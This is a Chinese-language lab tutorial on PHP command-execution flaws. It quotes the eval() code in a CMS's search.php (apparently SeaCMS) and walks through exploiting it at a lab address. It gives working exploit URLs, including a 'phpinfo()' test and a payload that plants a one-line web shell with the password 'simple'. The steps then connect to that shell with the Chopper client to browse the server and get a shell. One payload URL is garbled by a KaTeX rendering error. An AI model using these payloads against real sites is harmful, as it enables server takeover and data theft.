了解命令执行漏洞

命令执行的形成原理：
1）当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等，当用户可以控制命令执行函数中的参数时，将可以注入恶意系统命令到正常命令中，造成命令执行攻击。
2）脚本语言（如PHP）优点是简洁、方便，但也伴随着一些问题，如速度慢、无法接触系统底层，如果我们开发的应用（特别是企业级的一些应用）需要一些除去WEB的特殊功能时，就需要调用一些外部程序。
3）在PHP中可以调用外部程序的常见函数：system、exec、shell_exec、passthru、popen、proc_popen,应用在调用这些函数执行系统命令的时候，如果将用户的输入作为系统命令的参数拼接到命令行中，又没有过滤用户的输入的情况下，就会造成命令执行漏洞。
步骤如下：
1.1访问http://192.168.1.3/sea，访问网站首页，如图1所示

图1
1.2在网站的高级搜索中有一个0day漏洞，命令执行。在search.php中存在一个eval()函数。

for($m=0;$m<$arlen;$m++){
            $strIf=$iar[1][$m];
            $strIf=$this->parseStrIf($strIf);
            $strThen=$iar[2][$m];
            $strThen=$this->parseSubIf($strThen);
            if (strpos($strThen,$labelRule2)===false){
                if (strpos($strThen,$labelRule3)>=0){
                    $elsearray=explode($labelRule3,$strThen);
                    $strThen1=$elsearray[0];
                    $strElse1=$elsearray[1];
                    @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
                    if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
                }else{
                @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");
                if ($ifFlag)$content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
            }

使用exp：/search.php?searchtype=5&tid=&area=phpinfo()测试网站漏洞。
访问http://192.168.1.3/sea/search.php?searchtype=5&tid=&area=phpinfo()，网站有漏洞，输入命令之后，命令执行成功。如图2所示

图2
1.3由上图可知使用exp：/search.php?searchtype=5&tid=&area=eval(KaTeX parse error: Expected 'EOF', got '&' at position 92: …hp?searchtype=5&̲tid=&area=eval(_POST[simple])，此时构造一句话小马成功，小马密码为simple，如图3所示：

图3
1.4网页浏览小马，执行成功之后，使用菜刀连接已构造的一句话，双击打开菜刀，鼠标右击，点击“添加”，如图4、图5所示：

图4

图5
1.5在地址栏中填写上一步构造一句话的地址： http://192.168.1.3/sea/search.php?searchtype=5&tid=&area=eval($_POST[simple])，在标记2的地方填写一句话密码：simple，在最后脚本类型中选择PHP，最后点击“编辑”，如图6所示：

图6
1.6发现能遍历网站目录getshell成功。如图7所示

图7